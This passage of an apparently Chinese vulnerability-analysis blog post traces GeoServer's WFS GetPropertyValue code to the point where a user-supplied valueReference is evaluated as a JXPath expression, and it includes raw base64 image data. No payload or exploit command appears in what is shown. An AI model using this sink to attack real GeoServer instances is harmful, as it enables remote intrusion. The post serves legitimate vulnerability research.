/jNOa23RwXZoU/Q2dMWts0+x6UyuROxsnPF9t/8K5tvB54qTvXskavIh0ZTrGBjjog5t32q3Umprveg6O8r74lpNJqSJaNcRQHq1XOomtDPBfbosfQKbkVOQpPaaD5xJxavIozfF4eEhATcPfoRmvMqqMDxL0bgf/+9iuUHT+PYutehWD8C0//SHQjycfKrUfg04RV8s+8Uoje8C+EfIzBlq8xMAWtGP6HzzyEhIQEJp/6HFytVgwZXfhiNKVda4eu/z+KfnZ8j+MxEjFt/uxqlBAavkyIhIQHxx3/C6wU/Y8iHW5+PFaUXOqBr0Qmcv1W6K+PyOcS+0glhPA4rVR9fzgZw6e5dJCTcxrrBhHafRRfPn7vrMdC5JhqsSKeFcUhIkGL1AELrT44hISEBG4dLqqVubv2lY9f0AVj6MBxfRZzBmQNrMd5xO0ZN3gl9H6HPD1eL69FuS3vqnurkOn7woQEm/11at/TX0XDyCoJ/Gf1rcHvDXPzo8gm+Gu5lRt15iPvpDXR5Oxrt3hoMDwNtj9t5t6Tt8xteRwPv19CvvWWe8+rVc4BCUVByW6e8s2IsLsXkqgpVMxqNplJbUVFRyaZSqUilUpFSqaTCwkIqKCig/Px8UigUlJOTQ9nZ2ZSZmUkZGRl0OOo8resppnGrd9K0rkHk5duC+s/eS/8V6QmVl0ARnwyhFxt5kEdQRxr73UlK1hQnZf3fG2Rra1thEw/cRCl8O517k7bPGkBtA73It0UXmrjyX0otSXxYIt/M7sHk5RNCfWf9TUlKfvLplzfav5w4+undVyjI25fav/kT/Tq3BTX65ExJ8tFpbqX96raG7pcTX/3gIH0yuC35udqRk08L6jdjJyUU8uv69W/DqPvae0SUTL8OFFPLLy8REVHUjECadkxPyPil1MZtGkUbqMN0+xfp67BXaFlsaf64b14k50n7SUVERFfpixbB9PmFEoXRww39yG5sBOXx64Jp/VxdRC16zqT/DWlEgb1X0z8HZ1JLn6Y0dN01Kh5CHuNLRHR/HXUTj6XdBTyFKuE/WttdTOP/Lu1NxpWdtP7wHVLrdlTJvovln6Av2N3V9Ip4JP1flk4Fbchr2s+07f2O5OfRkFoPnE9HHpbqu2bt33T7nP17+DO9avcq/fywtD7l8ZnkGzSX/i0iIsqgrSPtaNBvT7SpRXRsmje9+E1caYGMGFr33qvUwldC3k060OivjpJMTWUxOr73aEW4mN7fryrbn5l6M4Gj/8WoaPcEMXVbc6/sbs7+VV3/xRRQxFgxha+4XXZ3Tc+P2yuog/8UOpart099iT4P6UO/yErlGrElrbzAWriOH8QxvlL6ZcIHtKWk27m0d6IXNf/0HOkfgunJDhrh0YLmnzVw1En7l74dHUr+Xg3ppbEb6Ld5Lanh7FPaxHu0bsIk2nIjl+j8Z9So6Wd00UhPcq8so1eDe9IPV3ON5LAMDkedp4yMDMrMzKTs7GzKyckhhUJB+fn5VFBQQLJHKZSdo6Cc3DzKyc2jXEV+mS0vv7DMVq0rKVTJVRRD5aict6UfbFP+LwCcibyG8OUHcWLrRFhvH4fP9qRrU9S4tvotzL4Vju/2ncU/W6fCfusozNpV7Ic79lkOqVQK6U8jQa1m47BUCqlUihvrhsCNl/RqxK1+G1NjX8TiPacRtX4MFGtH4bODmWVynYq8jk7LInFy1zx4RU7AJ3+n8JKPu3+EG+vfx+zrHfD9oWhselOOg/vKrgMXXwklQLpusAH5lTi8ZCz2eHyMvZfvIP7YMrQ8Nx6ztvG7jvYPao6EpIcAEnE7rzlEt+5CgVQ8uNcAjRuJgDMLEOTuDvfOX+GGYiOGuLvD3d0d7qFLEMer/Rex4PxpzGqla5GQl6uAvZ0dRACAbGSl1oebS+njay5uEmgysnnft
<p>可以看到实例化GetPropertyValue对象后调用run方法</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>ValueCollectionType</span> <span class=nf>getPropertyValue</span><span class=o>(</span><span class=n>GetPropertyValueType</span> <span class=n>request</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>WFSException</span> <span class=o>{</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>GetPropertyValue</span><span class=o>(</span><span class=n>getServiceInfo</span><span class=o>(),</span> <span class=n>getCatalog</span><span class=o>(),</span> <span class=n>filterFactory</span><span class=o>).</span><span class=na>run</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>来到run方法</p>
<p>这里拆开方法来讲</p>
<div class=highlight><pre><span></span><span class=x>if (request.getValueReference() == null) {</span>
<span class=x> throw new WFSException(request, "No valueReference specified", "MissingParameterValue")</span>
<span class=x> .locator("valueReference");</span>
<span class=x>} else if ("".equals(request.getValueReference().trim())) {</span>
<span class=x> throw new WFSException(</span>
<span class=x> request,</span>
<span class=x> "ValueReference cannot be empty",</span>
<span class=x> ServiceException.INVALID_PARAMETER_VALUE)</span>
<span class=x> .locator("valueReference");</span>
<span class=x>}</span>
</pre></div>
<p>首先确保我们的value的值不能为空的<br>
<a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202059-74c3c446-7a6f-1.png><img src="data:image/png;base64,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
<p>然后</p>
<div class=highlight><pre><span></span><span class=c1>// do a getFeature request</span>
<span class=n>GetFeatureType</span> <span class=n>getFeature</span> <span class=o>=</span> <span class=n>Wfs20Factory</span><span class=o>.</span><span class=na>eINSTANCE</span><span class=o>.</span><span class=na>createGetFeatureType</span><span class=o>();</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setBaseUrl</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getBaseUrl</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>getAbstractQueryExpression</span><span class=o>().</span><span class=na>add</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getAbstractQueryExpression</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setResolve</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getResolve</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setResolveDepth</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getResolveDepth</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setResolveTimeout</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getResolveTimeout</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setCount</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getCount</span><span class=o>());</span>
</pre></div>
<p>是在构建<code>GetFeature</code> 请求WFS 的基础请求,用于查询地理要素。通过 <code>GetPropertyValue</code> 请求,用户实际上是在请求特定地理特征中的某个属性的值,所以这里需要构建一个完整的 <code>GetFeature</code> 请求。</p>
<p>然后这里就是在执行GetFeature请求</p>
<div class=highlight><pre><span></span><span class=n>FeatureCollectionType</span> <span class=n>fc</span> <span class=o>=</span>
<span class=o>(</span><span class=n>FeatureCollectionType</span><span class=o>)</span>
<span class=n>delegate</span><span class=o>.</span><span class=na>run</span><span class=o>(</span><span class=n>GetFeatureRequest</span><span class=o>.</span><span class=na>adapt</span><span class=o>(</span><span class=n>getFeature</span><span class=o>)).</span><span class=na>getAdaptee</span><span class=o>();</span>
</pre></div>
<p>这里可以发现是在获取一些查询的信息了</p>
<div class=highlight><pre><span></span><span class=n>QueryType</span> <span class=n>query</span> <span class=o>=</span> <span class=o>(</span><span class=n>QueryType</span><span class=o>)</span> <span class=n>request</span><span class=o>.</span><span class=na>getAbstractQueryExpression</span><span class=o>();</span>
<span class=n>QName</span> <span class=n>typeName</span> <span class=o>=</span> <span class=o>(</span><span class=n>QName</span><span class=o>)</span> <span class=n>query</span><span class=o>.</span><span class=na>getTypeNames</span><span class=o>().</span><span class=na>iterator</span><span class=o>().</span><span class=na>next</span><span class=o>();</span>
<span class=n>FeatureTypeInfo</span> <span class=n>featureType</span> <span class=o>=</span>
<span class=n>catalog</span><span class=o>.</span><span class=na>getFeatureTypeByName</span><span class=o>(</span><span class=n>typeName</span><span class=o>.</span><span class=na>getNamespaceURI</span><span class=o>(),</span> <span class=n>typeName</span><span class=o>.</span><span class=na>getLocalPart</span><span class=o>());</span>
</pre></div>
<p>下面是重点部分</p>
<p>这里就是在根据我们的信息进行处理了</p>
<div class=highlight><pre><span></span><span class=n>PropertyName</span> <span class=n>propertyName</span> <span class=o>=</span>
<span class=n>filterFactory</span><span class=o>.</span><span class=na>property</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>(),</span> <span class=n>getNamespaceSupport</span><span class=o>());</span>
<span class=n>PropertyName</span> <span class=n>propertyNameNoIndexes</span> <span class=o>=</span>
<span class=n>filterFactory</span><span class=o>.</span><span class=na>property</span><span class=o>(</span>
<span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>().</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"\\[.*\\]"</span><span class=o>,</span> <span class=s>""</span><span class=o>),</span>
<span class=n>getNamespaceSupport</span><span class=o>());</span>
<span class=n>AttributeDescriptor</span> <span class=n>descriptor</span> <span class=o>=</span>
<span class=o>(</span><span class=n>AttributeDescriptor</span><span class=o>)</span>
<span class=n>propertyNameNoIndexes</span><span class=o>.</span><span class=na>evaluate</span><span class=o>(</span><span class=n>featureType</span><span class=o>.</span><span class=na>getFeatureType</span><span class=o>());</span>
<span class=kt>boolean</span> <span class=n>featureIdRequest</span> <span class=o>=</span>
<span class=n>FEATURE_ID_PATTERN</span><span class=o>.</span><span class=na>matcher</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>()).</span><span class=na>matches</span><span class=o>();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>descriptor</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=o>!</span><span class=n>featureIdRequest</span><span class=o>)</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>WFSException</span><span class=o>(</span>
<span class=n>request</span><span class=o>,</span> <span class=s>"No such attribute: "</span> <span class=o>+</span> <span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>());</span>
<span class=o>}</span>
</pre></div>
<p>处理的逻辑是在evaluate方法</p>
<p>一路重载到AttributeExpressionImpl.java类的evaluate方法这个方法就是用于通过属性访问器从给定对象中提取属性值。也就是我们</p>
<p>这里是使用lastAccessor也就是缓存的看看能不能访问到不能走到下面的逻辑</p>
<div class=highlight><pre><span></span><span class=n>PropertyAccessor</span> <span class=n>accessor</span> <span class=o>=</span> <span class=n>lastAccessor</span><span class=o>;</span>
<span class=k>if</span> <span class=o>(</span><span class=n>accessor</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>accessor</span><span class=o>.</span><span class=na>canHandle</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>))</span> <span class=o>{</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>value</span> <span class=o>=</span> <span class=n>accessor</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>);</span>
<span class=n>success</span> <span class=o>=</span> <span class=kc>true</span><span class=o>;</span>
<span class=o>}</span> <span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// fine, we'll try another accessor</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>这里就是用其他的访问器去寻找属性。PropertyAccessors.findPropertyAccessors()方法是主要逻辑,根据对象、属性路径(<code>attPath</code>)和目标类型寻找其他合适的 <code>PropertyAccessor</code></p>
<div class=highlight><pre><span></span><span class=k>if</span> <span class=o>(!</span><span class=n>success</span><span class=o>)</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>namespaceSupport</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>hints</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>hints</span> <span class=o>=</span> <span class=k>new</span> <span class=n>Hints</span><span class=o>(</span><span class=n>PropertyAccessorFactory</span><span class=o>.</span><span class=na>NAMESPACE_CONTEXT</span><span class=o>,</span> <span class=n>namespaceSupport</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>PropertyAccessor</span><span class=o>&gt;</span> <span class=n>accessors</span> <span class=o>=</span>
<span class=n>PropertyAccessors</span><span class=o>.</span><span class=na>findPropertyAccessors</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>,</span> <span class=n>hints</span><span class=o>);</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>Exception</span><span class=o>&gt;</span> <span class=n>exceptions</span> <span class=o>=</span> <span class=kc>null</span><span class=o>;</span>
<span class=k>if</span> <span class=o>(</span><span class=n>accessors</span> <span class=o>!=</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=k>for</span> <span class=o>(</span><span class=n>PropertyAccessor</span> <span class=n>propertyAccessor</span> <span class=o>:</span> <span class=n>accessors</span><span class=o>)</span> <span class=o>{</span>
<span class=n>accessor</span> <span class=o>=</span> <span class=n>propertyAccessor</span><span class=o>;</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>value</span> <span class=o>=</span> <span class=n>accessor</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>);</span>
<span class=n>success</span> <span class=o>=</span> <span class=kc>true</span><span class=o>;</span>
<span class=k>break</span><span class=o>;</span>
<span class=o>}</span> <span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// fine, we'll try another accessor</span>
<span class=k>if</span> <span class=o>(</span><span class=n>exceptions</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>exceptions</span> <span class=o>=</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;&gt;();</span>
<span class=o>}</span>
<span class=n>exceptions</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>找到后就使用get方法去提取属性值了</p>
<p>这里找到的属性是</p>
<p>get:271, FeaturePropertyAccessorFactory$FeaturePropertyAccessor (org.geotools.data.complex.expression)</p>
<p>方法如下</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=o>&lt;</span><span class=n>T</span><span class=o>&gt;</span> <span class=n>T</span> <span class=nf>get</span><span class=o>(</span><span class=n>Object</span> <span class=n>object</span><span class=o>,</span> <span class=n>String</span> <span class=n>xpath</span><span class=o>,</span> <span class=n>Class</span><span class=o>&lt;</span><span class=n>T</span><span class=o>&gt;</span> <span class=n>target</span><span class=o>)</span>
<span class=kd>throws</span> <span class=n>IllegalArgumentException</span> <span class=o>{</span>
<span class=n>JXPathContext</span> <span class=n>context</span> <span class=o>=</span>
<span class=n>JXPathUtils</span><span class=o>.</span><span class=na>newSafeContext</span><span class=o>(</span><span class=n>object</span><span class=o>,</span> <span class=kc>false</span><span class=o>,</span> <span class=k>this</span><span class=o>.</span><span class=na>namespaces</span><span class=o>,</span> <span class=kc>true</span><span class=o>);</span>
<span class=n>Iterator</span> <span class=n>it</span> <span class=o>=</span> <span class=n>context</span><span class=o>.</span><span class=na>iteratePointers</span><span class=o>(</span><span class=n>xpath</span><span class=o>);</span>
<span class=n>List</span> <span class=n>results</span> <span class=o>=</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;&gt;();</span>
<span class=k>while</span> <span class=o>(</span><span class=n>it</span><span class=o>.</span><span class=na>hasNext</span><span class=o>())</span> <span class=o>{</span>
<span class=n>Pointer</span> <span class=n>pointer</span> <span class=o>=</span> <span class=o>(</span><span class=n>Pointer</span><span class=o>)</span> <span class=n>it</span><span class=o>.</span><span class=na>next</span><span class=o>();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pointer</span> <span class=k>instanceof</span> <span class=n>AttributeNodePointer</span><span class=o>)</span> <span class=o>{</span>
<span class=n>results</span><span class=o>.</span><span class=na>add</span><span class=o>(((</span><span class=n>AttributeNodePointer</span><span class=o>)</span> <span class=n>pointer</span><span class=o>).</span><span class=na>getImmediateAttribute</span><span class=o>());</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=n>results</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>pointer</span><span class=o>.</span><span class=na>getValue</span><span class=o>());</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>if</span> <span class=o>(</span><span class=n>results</span><span class=o>.</span><span class=na>isEmpty</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IllegalArgumentException</span><span class=o>(</span><span class=s>"x-path gives no results."</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=k>if</span> <span class=o>(</span><span class=n>results</span><span class=o>.</span><span class=na>size</span><span class=o>()</span> <span class=o>==</span> <span class=mi>1</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=o>(</span><span class=n>T</span><span class=o>)</span> <span class=n>results</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=mi>0</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=k>return</span> <span class=o>(</span><span class=n>T</span><span class=o>)</span> <span class=n>results</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>重点是在iteratePointers方法</p>
<p>观察调用栈就明白了</p>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202043-6bb3b640-7a6f-1.png><img src=data:image/png;base64,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